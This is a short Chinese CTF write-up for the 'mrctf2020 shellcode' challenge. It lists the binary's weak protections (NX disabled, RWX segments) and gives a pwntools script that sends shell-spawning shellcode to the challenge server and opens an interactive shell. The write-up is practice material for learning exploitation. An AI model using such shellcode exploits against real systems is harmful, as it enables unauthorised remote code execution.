mrctf2020 shellcode
# mrctf2020 shellcode
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/mrctf2020_shellcode/mrctf2020_shellcode'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
1
2
3
4
5
6
7
2
3
4
5
6
7
# 思路分析
目前信息:
- Full RELRO
- No canary found
- NX disabled
- PIE enabled
- Has RWX segments
思路:
- 有可读可写可执行权限,根据上图程序流程,直接写入
shellcode即可
- 有可读可写可执行权限,根据上图程序流程,直接写入
# exp
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/mrctf2020_shellcode/mrctf2020_shellcode'
io = remote('node4.buuoj.cn', 27771)
# io = process(pwnfile)
elf = ELF(pwnfile)
shellcode = asm(shellcraft.sh())
io.recv()
io.sendline(shellcode)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
上次更新: 2022/08/15, 00:29:49